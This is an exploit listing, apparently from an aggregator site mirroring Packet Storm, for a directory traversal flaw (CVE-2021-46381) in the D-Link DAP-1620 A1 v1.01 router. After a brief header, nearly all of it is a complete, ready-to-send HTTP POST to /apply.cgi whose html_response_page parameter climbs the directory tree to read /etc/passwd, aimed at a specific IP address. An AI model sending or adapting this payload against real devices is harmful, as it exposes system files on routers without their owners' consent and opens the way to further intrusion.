Exploit for DLINK DAP-1620 A1 1.01 Directory Traversal CVE-2021-46381

Name: Exploit for DLINK DAP-1620 A1 1.01 Directory Traversal CVE-2021-46381
Rating: 5 (142 reviews)

2022-05-11 | CVSS 5.0

## https://sploitus.com/exploit?id=PACKETSTORM:167070
# Exploit Title: DLINK DAP-1620 A1 v1.01 - Directory Traversal  
# Date: 27/4/2022  
# Exploit Author: Momen Eldawakhly (Cyber Guy)  
# Vendor Homepage: https://me.dlink.com/consumer  
# Version: DAP-1620 - A1 v1.01  
# Tested on: Linux  
# CVE : CVE-2021-46381  
  
POST /apply.cgi HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
Referer: http://84.217.16.220/  
Cookie: ID=634855649  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Encoding: gzip,deflate,br  
Content-Length: 281  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36  
Host: 84.217.16.220  
Connection: Keep-alive  
  
action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass